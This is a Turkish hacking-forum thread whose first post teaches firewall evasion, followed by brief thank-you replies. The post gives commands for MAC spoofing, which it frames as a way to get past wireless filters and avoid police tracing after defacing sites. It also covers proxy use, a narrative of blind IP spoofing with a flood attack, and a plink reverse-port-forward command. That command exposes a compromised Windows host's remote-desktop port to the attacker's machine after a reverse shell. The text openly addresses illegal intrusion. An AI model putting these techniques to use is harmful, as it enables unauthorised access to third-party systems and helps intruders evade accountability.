Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Firewall atlatma
#1
Bu konuda Firewall'ları atlatmak için 3 yol anlatacağım.
1- MAC Spoofing

Sanırım bu yazıya başlamadan önce Mac kavramından biraz bahsetsem iyi olur.Mac Adresi net tabanlı iletişimde en az TCP/IP kavramı kadar önemlidir.Kısaca bahsedersek;
İnternete bağlı olduğunuz yerde sizin haricinizde 3 bilgisayar daha olduğunuz varsayalım ve bilgisayar arası iletişim yapacaksınız. Şayet bilgisayarlar arası bir bağlantı söz konusu ise gerekli protokol Mac(Media Access Protocol)tir. Tabii Mac Adresi öyle şıp diye verilmez,(iletişime geçmek istediğimiz makinanın ip adresini bildiğimizi varsayıyorum) İletişime geçeceğimiz bilgisayarın ip adresi ARP Protokolu ile öğreniriz.

www.deccal.org
Mac Adresi Nedir?
Mac Adresi hexadecimal bir adrestir.Yani XX:XX:XX:XX:XX:XX şeklindedir.Daha yakın bir örnek vermek gerekirse;22:00:CD:6C:43:32 gibidir. Daha önce de bahsettiğim gibi bilgisayarlar arası ağlarda kullanılır lakin bunun dışında pek bilinmeyen ama can alıcı noktalarda da kullanılır.Wireless kullanıcıları muhakkak modem arayüzlerinde “Mac Filtreleme” kısmını görmüşlerdir.Bu bir ek güvenliktir.Yani modem kaydedilen mac adreslerini bloklar ya da kayıtlı olmayan mac adreslerine erişim vermez.Bir de kanun dışı bir iş yaptığınızda siber polisler tarafından kullanılabilen bir adrestir(ip den sonra tabii).Bu noktayı atlayan bazı attacker’lar sadece ip adreslerini gizleyerek deface yaparlar ve kendilerini tehlikeye atmış olurlar.

Neden Mac Adresimi Gizleme Gereği Duyayım?
Mac Adresini gizlemek için birkaç sebebiniz olabilir.Bunlardan en önemlisi wireless engellerini aşmak için diyebiliriz. Biliyorsunuz “WEP” şifreleme türünün eksikliklerinden dolayı kısa sürede kırılabiliyor ve sömürülebiliyor ama bazı dikkatli kullanıcılar bunu fark ediyor ve AP arayüzünden ya da wireless driver programı sayesinde sizin Mac Adresinizi alıyor ve AP’ye erişmenizi blokluyor, bunu aşmanın yolu da Mac Spofing’den geçiyor.

Bir diğer sebep ise illegal işlere meraklı olmanız.Şayet web sitelerine izinsiz ziyaretlerde bulunuyor ve gizlendiğinizden emin olmak istiyorsanız mac adresinizi gizlemelisiniz.Birçok kişinin veri iletimlerinde kullanılan şeyin sadece IP olduğunu düşünmesi ve sadece IP gizleyip Web sitelerine bodoslama sefere çıkmaları daha sonra web sitelerinin şikayette bulunması ve bahsi geçen atacker’ların Mac Adres’lerinin tespit edilmesi ile mahkeme sürecinin başlaması ile sonuçlanabiliyor.

Eğer 3. bir sebep düşünürsek de paranoyaklık olabilir.İnternette sürekli birilerinin sizi izlediği düşüncesi ve gizlenme isteği…

Nedir Benim Mac Adresim?
Mac Address internete bağlanacak olan her bilgisayarda olması gereken adrestir,tıpkı IP Address gibi.Bu adres bilgisayarın ağ kartı ile ilgilidir ve ağ kartının yapıldığı fabrikada karta atanır,dolayısı ile değiştirilemez , ama bu adresi almaya çalışan kişilerin farklı mac adresi almasını sağlayabiliriz. Peki bu adresi bilgisayarımızda nasıl öğrenebiliriz?Bu durum işletim sistemine göre farklılık gösteriyor bu yüzden windows ve linux’ta farklı şekilde öğreniyoruz ikisini de inceleyeceğiz.

Eğer işletim sisteminiz Windows ise yapmanız gereken işlemler,komut satırına
ipconfig /all
www.deccal.org
00: d0:94:a2:es:87
İşte Mac Adresimiz bu.Peki bunu Windows üzerinde en güzel nasıl gizleyebiliriz.Aslında daha çok yöntem olmasına karşın sizlere kendi denediğim ve sonuç aldığım şeyleri anlatacağım.

Bu yöntemde regedt32 kullanacağız. Dikkat ettiyseniz “regedit” kullanmıyoruz bu kısım önemli.Daha öncesinde yapmamız gereken birkaç iş var;

1.Komut satırına gelin ve “ipconfig /all” komutunu verin

2.Daha sonra ” net config rdr ” komutu veriyoruz

www.deccal.org
Bu işlemde {} işaretleri arasındaki kısmı bir yere kopyalayın,daha sonra işimize yarayabilir.() işaretleri arasında da fark ettiyseniz Mac Adresimiz var. Yazılışı farklı arada “:” yok dikkat!

3.Şimdi çalıştır’a “regedt32" yazıp enter’lıyalım,
Tavsiye olarak sizden isteğim registry ‘i değişiklik yapmadan önce yedeklemeniz,olası bir yanlış değişiklikte paçayı kurtarabilirsiniz.Bunu “Registry -> Save Subtree As” diyerek yapabilirsiniz.

4.Şimdi “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Co ntrol\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318} alt anahtarına gidin ve bu alt anahtarda 0000,0001 gibi alt klasörler görmelisiniz.

İnternete bağlanırken hangi ağ kartınızı kullanıyorsanız onun olduğu ilgili kısmı bulmanız gerekli(0000 gibi klasörlerin biri).Bulduğunuz bu klasör’e tek tıklayın,sağ tarafta bir anahtarlar bütünü göreceksiniz.Bu kısımda NetworkAddress adından bir REG_SZ anahtarı olmalı bu anahtara çift tıklayın ve değiştirmek istediğiniz yeni Mac Adresinizi yazın.

5.Bilgisayarınızı baştan başlatın.

Bu yöntem dışında, internette çok sayıda MAC adresi değiştirmek için yazılmış programlar bulunmakta. Daha basit bir şekilde bu işlemi yapmak için bu programlarıda kullanabilirsiniz.

Linux Üzerinde Mac Adresi Gizleyebilirmiyiz ?

Linux kullanmaya hevesli unix dünyasına yeni katılan arkadaşlardan en çok gelen soru linux üzerinde gizlenme nasıl oluyor.Aslında bu konuda linux windows’tan daha başlarılı diyebilirim(birçok konuda olduğu gibi).Yapmamız gerekenler;

1.Terminal’e geçin ve root olun daha sonra “ifconfig” komutunu verin
2.Şimdi bazı komutlar dizisi vereceğim onları yazın daha sonra açıklamalarını da yazacağım.

*service network stop
*ifconfig eth1 hw ether 02:A1:02:0A:05:57
*service network start


1. ve 3. komut gayet basit aslında 1.si ağ trafiğini durduruyor 3. sü ise ağ trafiğini tekrar başlatıyor,peki 2. komutta ne yaptık ? ifconfig çıktısına göre ağ bağlantımızın eth1 olduğunu öğrendik, HWaddr kısmı da bizim Mac adresimizi gösteriyor dolayısı ile komut eth1 bağlantısındaki Mac Adresini şu yap manasına geliyor.Bunu her linux’u başlattığımızda yapmamız gerekiyor o yüzden dilerseniz terminalde

vi /etc/sysconfig/network-scripts/ifcfg-eth1

komutunu verirseniz “ifcfg-eth1" dosyasını vi editörü ile açarsınız ve karşınıza gelen satırlardan MACADDR= olan kısmı uygun şekilde düzenleyip değiştirirseniz her zaman Mac Addresinizi gizli tutmuş olursunuz.

2-IP Spoofing
Gelelim IP Spoofing Tekniklerine :

IP Spoofing birkaç şekilde yapılır bunun en etkili yöntemi ise IP Paketlerini Editleyerek yapılan yöntemdir bu yöntemle yapılan saldırılara internet dilinde DDoS Attack diyoruz. Diğer yöntem ise Proxy/Socks sunucularını kullanarak yapmaktır.
www.deccal.org
PROXY & SOCKS Kullanımı

Proxy kullanmak demek ip adresiniizi gizlemek demektir. Neden ip adresimi gizleyeyim derseniz hemen konuya balıklamasına dalalım. Bir internet sayfasına girdiğiniz zaman yada bir Servere bağlantı yaptığınızda sistem sizin kimlik bilginizi yani IP Adresinizi kayıt eder. Eğer bağlandığınız sistemin yada girdiğiniz internet sayfasının sizin kimlik bilginizi yani ip adresini kayıt etmesini istemiyorsanız. Proxy yada Socks kullanmanız gerekmektedir.

Proxy & Socks Nedir ?

Proxy bağlantısı ile bir servere bağlanmak aslında kimlik gizlemenin en basit yöntemidir. İnternet aleminde birçok online server vardır. Bir bağlantı yaparken ilk önce Proxy serverine bağlanıp sonra o server üzerinde istediğiniz internet sayfasına girdiğiniz zaman o internet sayfası yada host sizi görmeyecek sadece üzerinden çıkış yaptığınız Proxy serverin bağlantı yaptığını zannedecektir. Yani bir nokta ile diğer bir nokta arasında bağlantı yaparken 3. bir nokta üzerinden geçerek bağlantı yapmış olursunuz. İşte bu yöntemle karşı server yada internet sitesi üzerinden bağlantı yaptığınız Proxy serverinin ip adresini kayıt edecek ve sizin sisteminizin ip adresini bilmeyecektir.
İnternet deryasında yüzlerce hatta binlerce hatta ve hatta yüzbinlerce Proxy sunucusu mevcuttur sürekli onlinedirler ve birçoğu da bedavadır. Bunları rahatlıkla kullanabilirsiniz. Proxy kullanmak için Kullandığınız tarayıcıya bir ayar yapmak zorundasınız.

Tarayıcılara Proxy Ayarlaması
Eğer Google Chrome kullanıyorsanız sağ en üstte bulunan alyan anahtarı simgesine tıklayıp "Ayarlar" seçeneğine girin. Daha sonra sayfanın altındaki "Gelişmiş ayarları göster..." bağlantısına tıklayın.Sayfa aşağıya doğru açıldığında Ağ başlığı altındaki "Proxy ayarlarını değiştir..." düğmesine tıklayın.Açılan pencerede "Bağlantılar" sekmesindeki "Yerel Ağ Ayarları"nı tıklayın."Proxy Sunucusu"nun altında bulunan "Yerel ağınız için bir proxy sunucu kullanın (Bu ayarlar çevirmeli bağlantılarda ya da VPN bağlantılarında geçerli olmaz)" seçeneğinin yanında ki onay kutucuğuna tıklayın. Bulduğunuz proxy IP’sini ve Port’unu girerek "Tamam"a tıklayın.
www.deccal.org

Mozilla Proxy Ayarlaması :

ARAÇLAR menüsüne geliyoruz oradan SEÇENEKLER’i tıklıyoruz. GELİŞMİŞ’e gelip AYARLAR tıklıyoruz. Bu bölümde VEKİL SUNUCU AYARLARI kutusunu işaretleyip proxy sunucumuzu ve port numarasını girmemiz yeterli. İşte mozilla ile artık proxy kullanmaya başladık bile…

Proxy Sunucuları Nereden Bulacağım ?

Google’da arattığımızda proxy dağıtan bir sürü site bulabiliriz. Bunlar sürekli güncellenir.. Peki Proxy neye benzer? İşte birkaç proxy örneği;
192.41.135.218:3127 elite proxy Switzerland (Zürich)
192.41.135.218:3128 CoDeeN Network Switzerland (Zürich)
192.41.135.219:3124 CoDeeN Network Switzerland (Zürich)
192.41.135.219:3127 elite proxy Switzerland (Zürich)
192.41.135.219:3128 CoDeeN Network Switzerland (Zürich)

Proxy sunucularında önemli olan hızlı çalışmasıdır. Ve birde sağlam olması birçok host firması proxy sunucularını sistemlerine bağlanmasını bloke edebiliyor. Eğer illada o sisteme bağlanacaksanız bilinmeyen ortalıkta dolaşmayan bir proxy suncusu bulmanızı öneririm….

IP PAKETLERİNİ EDİTLEMEK

En etkili Ip Spoofing tekniği budur işte eğer ileri yani profesyonel derecede TCP/IP bilginiz varsa o zaman bu yöntemi biliyorsunuz demektir. IP Paketlerini editlemek uzun bir ders açıkcası sadece çok kısa olarak değineceğim. UDP/TCP/ICMP/IGMP paket yapıları, 3way handshaking ve Seq# ile Ack# ile editleme yapılabilir.

Ip paketlerini editlemek ne işe yarıyor ? Küçük bir örnek vererek açıklayayım. Mesela TurkHackTeam adresindeki sunucu yani server yönetim için bağlantı sağlandığında server şifrelerini bilseniz dahi ip adresiniz 10.10.10.100 olmadığı sürece sizi sisteme almıyor. Bu aslında bir güvenlik yöntemidir. Mesela benim Sabit bir IP adresim var serverime bu adresi tanımlıyorum ve bu adresin dışındaki hiçbir IP den Serverimin root şifrelerini bilse dahi server’imin yönetim için bağlantıları kabul etmemesini sağlamamdır.

Saldırgan server şifrelerini ele geçirdi fakat sisteme koyduğum bu güvenlik önleminden dolayı bağlantı sağlayamıyor. İşte bu durumda IP paketlerini editleme yöntemi devreye giriyor. Saldırgan sisteme bağlantı sağlarken ip paketlerini editleyerek gönderiyor ve kendi ip adresini sanki benim IP adresimle bağlantı sağlıyormuş gibi TCP IP lerin Seq# Ack#lerini değiştirerek sisteme 10.10.10.100 IP’sinden bağlantı gelmiş gibi gösteriyor . Tabi sadece sisteme benim IP den geliyormuş gibi Seq# Ack# lerini değiştirmek yetmiyor birde server’in verdiği yanıtları kendine yönlendirmesi gerekiyor. İşte bu yöntem ile servere gelen ve giden IP adreslerini sanki benim ip adresimden geliyormuş gibi değiştirme yapması yani Edit lemesi… IP spoofing yöntemlerinin en etkilisidir.

Çözülmesi fark edilmesi en zor olanı Microsoft, NASA gibi sistemlerin korkulu rüyası diyebilirim...

ÖRNEK :

GÜVENLİ.MAKİNA ———syn——-> SERVER.MAKINASI
SERVER.MAKINASI ———syn/ack—–> GÜVENLİ.MAKİNA
GÜVENLİ.MAKİNA ———-ack——-> SERVER.MAKİNASI


Bu yukarıda gördüğünüz normal bir bağlantı şekli veri alışverisidir. Şimdi bir saldırgan bu sisteme girmek isterse yapması gereken servere saldırgan olmadığını göstermektir. Yani serverin ona güvenmesi gerekmektedir.

Bunun için kendini Güvenli makina yapması yani sanki güvenli makinadan bağlantı geldiğini göstermesi lazım. Saldırgan IP spoofing’ in TCP/IP editleme yöntemi ile güvenli makina kılığına girmesi Server Makinasının durumu anlamamasıdır.

SALDIRGAN.MAKİNASI ——syn—-> GÜVENLİ.MAKİNA

Burada saldırgan güvenli makinaya sürekli Flood yani tekrar yapıyor. Ve ip adreslerini Spoof ediyor.

SALDIRGAN.MAKINASI ——connect—-> GÜVENLİ.MAKİNA

Saldırgan flood yaparak Güvenli Makinayı meşgul etti yani bir nevi cevap vermesini önlüyor. Sonrada ISN kayıt etmeye başlıyor. Bu sırada Saldırgan Server makinaya bağlantıya geçiyor.

SERVER.MAKINASI —-syn/ack —-> .......

Güvenli Makina Flood saldırısına uğradığı için Server Makinasına Cevap veremiyor.. Server makinasının paketleri kayboluyor. İşte bu sırada Saldırgan devreye giriyor ve server makinaya cevap veriyor tabiki Editlenmiş paketlerle ...

SALDIRGAN.MAKINASI —–syn —> SERVER.MAKİNA

Devamında Güvenli makinanın iplerini Spoof edilmiş ve editlenmiş paketleri Server makinasına gönderiyor. Server Makinası flood halinde olan Güvenli makinadan hiçbir cevap alamıyor. Saldırganın makinasından gelen sahte isteklere boyun eğiyor..

GÜVENLİ.MAKİNA (SALDIRGAN) —–syn/ack——> SERVER.MAKINASI

www.deccal.org

İşte Güvenli makinanın kılığına girerek yani iplerini editleyerek server makinasına bağlantı sağlıyor.
Bu sırada Güvenli makina Flood saldırısına uğradığı için çok yoğun ve meşgul yani kendi ip sinden çıkış yapamıyor. Server Makinayla irtibayı kopuk oluyor. Saldırgan ise Server Makinasına sahte ip’den yani Güvenli Makinadan Spoof ettiği ve Edit’lediği ip ile bağlantı kurdu bile….Buna Blind Spoof denir.


3-SSH Tunneling

Icerik filtreleme sistemlerini atlatmak icin kullanacağımız yöntem SSH Tünelleme.

Kısaca bilgilerimizi tazeleyelim:
• SSH servisi öntanımlı olarak 22/TCPportunda çalışır ve istenirse değiştirilebilir.
• Proxy’ler CONNECT metodu ile http olmayan çeşitli bağlantılara izin verirler. Mesela HTTPS. Bunun için genelde Proxy yapılandırmalarında 443 TCP portu dışarıya doğru açıktır.
• SSH protokolü Proxy’lerin CONNECT yöntemini kullanarak ssh sunuculara bağlanabilirler.
Bu yazıda kullanacağımız yöntem de 443. porttan çalışan SSH sunucusu bulup kendi sistemimiz ile bu sunucu arasında tunnel kurarak web trafiğimizi bu tünelden geçirmek. Arada gidip gelen veri şifreli olduğu için içerik filtreleme yazılımları bize engel çıkarmayacaktır.

SSH Tünelleme (SSH Tunneling)

Eğer İçeriklere Ulaşmayı Engelleyecek Bir Yazılım/Donanım (Firewall) Varsa; SSH İle Bir Tünel Oluşturulup (Server-Client) Gelen Bağlantılar SSH’e Yönlendirilebilir. Böylelikle Yönlendirilen Sisteme Gönderilen İstekler Servera Gidiyormuş Gibi Görünür ve Cevaplanır.

SSH Tünelleme İle Güvenlik Duvarı Atlatma (Firewall Bypass)

Senaryo

Saldırgan : Uzak Masaüstü Yapacağı Sisteme Erişmiştir (Meterpreter, Reverse Shell). Bu Makalede Reverse Shell Baz Alınacaktır.
Hedef : Router / Firewall NAT Arkasında ve Uzak Masaüstü Portuna Gelen Bütün Bağlantı İsteklerini Engelliyor (Sadece Belirli IP ’ler)
Amaç : Hedef Sisteme Uzak Masaüstü Bağlantısı Yapmak

Kullanılan Araçlar

Plink : SSH İstemcisi
Backtrack Live CD : Güvenlik Araçlarının Bulunduğu Linux İşletim Sistemi

Saldırgan IP : 192.168.52.129 > BackTrack Linux
Hedef IP : 192.168.128.131 > Windows

SSH İstemcisi Plink Upload Ettikten Sonra SSH Tüneli Oluşturalım;

Komut ;

plink -P 22 -l root -pw zero -C -R 3389:localhost:3389 192.168.52.129



www.deccal.org

Yani;

plink -P "ssh srv port" -l "ssh svr user" -pw "ssh svr pass" -C -R "yerel port":localhost(127.0.0.1):"uzak port" "ssh svr ip"

Parametreler;


-p : Port
-l : SSH Kul.
-pw : Şifre
-C : Sıkıştırma
-R : Port Yönlendirme (Uzaktan Yerele)

www.deccal.org

Ve işlem tamamdır..


Beğenenler:
#2
güzel anlatım olmuş eline sağlık
Beğenenler:
#3
saolasın kardeşim exciting
Beğenenler:
#4
eline sağlık
Beğenenler:
#5
önemli değil abi faydalı olduysa ne mutlu bana exciting
Beğenenler:
#6
eline sağlık
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#7
(30-01-2014, Saat: 00:21)H4CK4L Adlı Kullanıcıdan Alıntı: eline sağlık
eyvallah abi solasın faydalı olduysa ne mutlu bana exciting
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Konfigürasyon Çekerken Forbidden Hatasını Atlatma KingSkrupellos 0 122 01-07-2016, Saat: 02:44
Son Yorum: KingSkrupellos
  WAF(Web Application Firewall) Bypass cLowN 0 782 16-02-2014, Saat: 16:29
Son Yorum: cLowN
  Firewall Nedir Firewalllar nasıl çalışır? archavin 0 407 26-01-2014, Saat: 19:45
Son Yorum: archavin
Anahtar Kelimeler

Firewall atlatma indir, Firewall atlatma Videosu, Firewall atlatma Online izle, Firewall atlatma Bedava indir, Firewall atlatma Yükle, Firewall atlatma Hakkında, Firewall atlatma Nedir, Firewall atlatma Free indir, Firewall atlatma Oyunu, Firewall atlatma Download


1 Ziyaretçi